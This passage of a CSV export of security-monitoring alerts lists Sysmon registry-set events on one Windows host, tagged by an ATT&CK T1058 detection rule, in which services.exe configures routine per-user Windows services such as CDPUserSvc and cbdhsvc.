service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.835504900Z"",""eventRecordID"":""1113"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.639",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.835184500Z"",""eventRecordID"":""1112"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.608",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.834031600Z"",""eventRecordID"":""1111"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.568",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.833496300Z"",""eventRecordID"":""1110"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.512",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.831714000Z"",""eventRecordID"":""1109"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.475",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.831398200Z"",""eventRecordID"":""1108"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.426",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.829992100Z"",""eventRecordID"":""1107"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 13:22:15.304",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.829538900Z"",""eventRecordID"":""1106"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.230",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.827314200Z"",""eventRecordID"":""1105"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 13:22:15.212",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.827021100Z"",""eventRecordID"":""1104"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.152",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.825820900Z"",""eventRecordID"":""1103"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.072",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.825135900Z"",""eventRecordID"":""1102"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.990",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.822186900Z"",""eventRecordID"":""1101"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:14.971",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.821984700Z"",""eventRecordID"":""1100"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:14.931",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.820838600Z"",""eventRecordID"":""1099"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 13:22:14.855",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.820578700Z"",""eventRecordID"":""1098"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_42bf6\\Start\r\nDetails: DWORD 